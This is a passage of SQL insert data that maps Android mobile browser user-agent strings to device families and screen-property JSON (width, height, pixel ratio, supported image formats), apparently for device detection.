Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; vivo 2019) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx 10 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx 9 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx 9 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx 9T Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx 9T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx A2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx A2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx MIX 2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx MIX 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx Note 10 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx Note 10 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; xx Note 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile DuckDuckGo/5 Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; 21061119AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; 21061119AL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; 21061119DG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; 2107113SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; 2109119DG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; A70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; AC2001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; AC2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; ASUS_I002D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; ASUS_I006D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; ASUS_I01WD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; BE2013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; BE2029) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; BISON) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1911) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1917) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1933) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1937) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1941) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1951) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1969) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1979) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH1989) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2009) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2023) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":792,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":792,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2037) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2043) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2059) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2061) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2065) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2067) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2069) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2089) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2091) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2095) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2109) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2125) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2127) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2135) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2145) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2159) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2161) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2173) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":804,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2195) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2197) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2205) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2207) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2209) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2211) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2217) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2219) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2239) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2247) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; CPH2269) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; DN2103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; EB2103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; GM1900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 